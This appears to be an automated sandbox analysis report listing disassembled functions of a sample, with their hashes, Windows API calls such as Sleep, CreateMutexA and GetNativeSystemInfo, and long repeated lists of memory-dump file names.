Associated: 00000000.00000002.1696486424.0000000001182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696672773.0000000001184000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696711179.0000000001187000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696758341.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697022753.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697171716.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697597915.00000000011FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697614449.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697629483.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697644510.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697658599.0000000001206000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697712710.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697821760.0000000001217000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: e65cdf2cdaec97775c736376c7acbea30232c4e6114213aa6e6a030c9c8c14b2
Instruction ID: 21fe491f78dde727a70f5529f489b8191306d08f0817e06ac6701fb43f5e477f
Opcode Fuzzy Hash: e65cdf2cdaec97775c736376c7acbea30232c4e6114213aa6e6a030c9c8c14b2
Instruction Fuzzy Hash: A7311231B003049BEB18DB78DC89BADB772EB86320F248618E4549B2D5D77A8980B756

Function 00F09ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00F0A963
CreateMutexA.KERNEL32(00000000,00000000,00F63254), ref: 00F0A981

Memory Dump Source

Source File: 00000000.00000002.1695364791.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1695326921.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695364791.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695422177.0000000000F69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695438074.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695452967.0000000000F77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695639337.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695661137.00000000010D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695801495.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695826855.00000000010F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695883229.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695897796.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695914999.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695933011.00000000010FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695947507.0000000001105000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695961739.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695974868.0000000001107000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695987521.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696004687.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696017740.0000000001124000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696031819.0000000001126000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696044481.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696058378.000000000112F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696071818.0000000001134000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696084623.0000000001135000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696100276.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696117074.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696132441.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696145123.0000000001152000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696161182.0000000001156000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696174598.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696188767.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696207267.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696286023.0000000001168000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696387027.0000000001170000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696401831.0000000001172000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696472516.0000000001181000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696486424.0000000001182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696672773.0000000001184000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696711179.0000000001187000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696758341.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697022753.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697171716.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697597915.00000000011FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697614449.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697629483.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697644510.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697658599.0000000001206000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697712710.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697821760.0000000001217000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 77594cbc4d2069ff7a31501b90772a5e6eb9b95743171ca156006838cfa8014c
Instruction ID: 670947f137178ccf6abcbcb3e19491d00b7aaf7743677498fd3866894a3ce3cc
Opcode Fuzzy Hash: 77594cbc4d2069ff7a31501b90772a5e6eb9b95743171ca156006838cfa8014c
Instruction Fuzzy Hash: FD2129317042049BEB189B68EC997ACF762EBD1320F244219E454D72D6E7B99A80B752

Function 00F0A856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00F0A963
CreateMutexA.KERNEL32(00000000,00000000,00F63254), ref: 00F0A981

Memory Dump Source

Source File: 00000000.00000002.1695364791.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1695326921.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695364791.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695422177.0000000000F69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695438074.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695452967.0000000000F77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695639337.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695661137.00000000010D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695801495.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695826855.00000000010F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695883229.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695897796.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695914999.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695933011.00000000010FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695947507.0000000001105000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695961739.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695974868.0000000001107000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695987521.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696004687.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696017740.0000000001124000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696031819.0000000001126000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696044481.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696058378.000000000112F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696071818.0000000001134000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696084623.0000000001135000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696100276.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696117074.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696132441.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696145123.0000000001152000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696161182.0000000001156000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696174598.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696188767.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696207267.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696286023.0000000001168000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696387027.0000000001170000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696401831.0000000001172000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696472516.0000000001181000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696486424.0000000001182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696672773.0000000001184000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696711179.0000000001187000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696758341.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697022753.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697171716.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697597915.00000000011FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697614449.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697629483.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697644510.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697658599.0000000001206000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697712710.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697821760.0000000001217000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 3dcc5362d86d6880a40df5ea5af343dfd7560ca7f79941b49bb292b38f6bd732
Instruction ID: 7b663157c136bda81baca59df49b721913a25640c210ef0bfc4c5de7fb73e59f
Opcode Fuzzy Hash: 3dcc5362d86d6880a40df5ea5af343dfd7560ca7f79941b49bb292b38f6bd732
Instruction Fuzzy Hash: C9217C31B453019BEB24A7689C9B77DF2A2DF81310F248816E944D72D1DB7A8981B293

Function 00F0A34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00F0A963
CreateMutexA.KERNEL32(00000000,00000000,00F63254), ref: 00F0A981

Memory Dump Source

Source File: 00000000.00000002.1695364791.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1695326921.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695364791.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695422177.0000000000F69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695438074.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695452967.0000000000F77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695639337.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695661137.00000000010D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695801495.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695826855.00000000010F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695883229.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695897796.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695914999.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695933011.00000000010FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695947507.0000000001105000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695961739.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695974868.0000000001107000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695987521.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696004687.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696017740.0000000001124000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696031819.0000000001126000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696044481.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696058378.000000000112F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696071818.0000000001134000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696084623.0000000001135000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696100276.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696117074.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696132441.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696145123.0000000001152000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696161182.0000000001156000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696174598.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696188767.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696207267.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696286023.0000000001168000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696387027.0000000001170000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696401831.0000000001172000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696472516.0000000001181000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696486424.0000000001182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696672773.0000000001184000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696711179.0000000001187000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696758341.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697022753.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697171716.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697597915.00000000011FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697614449.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697629483.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697644510.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697658599.0000000001206000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697712710.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697821760.0000000001217000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 24a9088855d755ddd969bbc093c18e397d4e28bc196d1b538de886db4518d360
Instruction ID: 11246682780e0f4b96a3450f6402a0ae01301f5f0c0d0cad0876e01059d00b38
Opcode Fuzzy Hash: 24a9088855d755ddd969bbc093c18e397d4e28bc196d1b538de886db4518d360
Instruction Fuzzy Hash: 382176327003049BEB189B68EC897ACF772DBE2320F244219E854D76D0D77A8AC0B353

Function 00F07D30 Relevance: 1.9, APIs: 1, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F07ED3

Memory Dump Source

Source File: 00000000.00000002.1695364791.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1695326921.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695364791.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695422177.0000000000F69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695438074.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695452967.0000000000F77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695639337.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695661137.00000000010D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695801495.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695826855.00000000010F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695883229.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695897796.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695914999.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695933011.00000000010FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695947507.0000000001105000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695961739.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695974868.0000000001107000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695987521.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696004687.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696017740.0000000001124000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696031819.0000000001126000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696044481.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696058378.000000000112F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696071818.0000000001134000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696084623.0000000001135000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696100276.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696117074.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696132441.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696145123.0000000001152000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696161182.0000000001156000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696174598.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696188767.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696207267.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696286023.0000000001168000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696387027.0000000001170000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696401831.0000000001172000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696472516.0000000001181000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696486424.0000000001182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696672773.0000000001184000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696711179.0000000001187000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696758341.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697022753.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697171716.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697597915.00000000011FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697614449.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697629483.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697644510.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697658599.0000000001206000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697712710.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697821760.0000000001217000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_file.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: ff381471cc3c1ab2f3310feec9f980f8b6f93e2c87fc1c56f09a38e0a34df3e7
Instruction ID: d9bbbe55b130570b0cda94685aad1c539ec57614aae8b7974839d05439f294cd
Opcode Fuzzy Hash: ff381471cc3c1ab2f3310feec9f980f8b6f93e2c87fc1c56f09a38e0a34df3e7
Instruction Fuzzy Hash: E8E1E771E006449BDF14BB28CD4B39E7B71AB82720F94429CE455673C2DB799E81BBC2

Function 00F3D82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F3A813,00000001,00000364,00000006,000000FF,?,00F3EE3F,?,00000004,00000000,?,?), ref: 00F3D871

Memory Dump Source

Source File: 00000000.00000002.1695364791.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1695326921.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695364791.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695422177.0000000000F69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695438074.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695452967.0000000000F77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695639337.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695661137.00000000010D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695801495.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695826855.00000000010F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695883229.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695897796.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695914999.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695933011.00000000010FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695947507.0000000001105000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695961739.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695974868.0000000001107000.00000080.00000001.01000000.00000003.sdmpDownload File
